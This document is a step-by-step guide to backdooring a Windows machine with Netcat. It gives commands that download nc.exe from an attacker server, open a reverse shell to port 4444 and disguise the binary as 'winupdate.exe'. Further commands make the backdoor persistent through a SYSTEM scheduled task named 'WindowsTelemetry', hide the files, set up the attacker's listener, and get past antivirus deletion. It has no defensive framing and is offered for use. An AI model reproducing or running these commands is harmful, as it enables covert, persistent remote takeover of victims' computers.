Backdoor Deployment and Connection Guide
Step 1: Upload Netcat binary to target machine
curl http://100.80.174.100:8000/nc.exe -o C:\Windows\Temp\nc.exe
This command uses curl to download the Netcat executable from the attacker's Python HTTP server
and saves it in a writable directory on the victim's machine.
Step 2: Test the binary works
C:\Windows\Temp\nc.exe 100.80.174.100 4444 -e cmd.exe
This command starts a reverse shell from the victim to the attacker at 100.80.174.100 on port 4444
using cmd.exe.
Step 3: Move Netcat and create a persistent batch script
move C:\Windows\Temp\nc.exe C:\ProgramData\winupdate.exe
echo C:\ProgramData\winupdate.exe 100.80.174.100 4444 -e cmd.exe >
C:\ProgramData\updater.bat
This moves the Netcat binary to a hidden location and creates a batch file that starts it.
Step 4: Create a persistent scheduled task
schtasks /create /tn "WindowsTelemetry" /tr "C:\ProgramData\updater.bat" /sc onlogon /ru SYSTEM
This creates a scheduled task that runs at system logon as SYSTEM.
Step 5: Optional PowerShell version for stealth and encoding
Set-Content -Path "C:\ProgramData\winupdate.ps1" -Value "$c=New-Object
Net.Sockets.TCPClient(...);"
schtasks /change /tn "WindowsTelemetry" /tr "powershell -w hidden -nop -file
C:\ProgramData\winupdate.ps1"
This version replaces the batch file with a PowerShell script for stealth and encodes the command.
Step 6: Hide backdoor files
attrib +h +s C:\ProgramData\winupdate.exe
attrib +h +s C:\ProgramData\winupdate.ps1
These commands hide the files by marking them hidden and system attributes.
Step 7: Manually trigger or test the backdoor
schtasks /run /tn "WindowsTelemetry"
Or manually run:
C:\ProgramData\winupdate.exe 100.80.174.100 4444 -e cmd.exe
This forces immediate execution to test the connection.
Step 8: Attacker listener setup
nc -lvnp 4444
This command on the attacker's Linux machine listens for incoming reverse shell connections.
Troubleshooting tips
- Ensure your IP is reachable from victim (check firewall/VPN).
- Make sure the port (4444) is not blocked.
- Re-upload the nc.exe if antivirus deleted it.
- Check scheduled task path is correct.
- Run the scheduled task manually to test.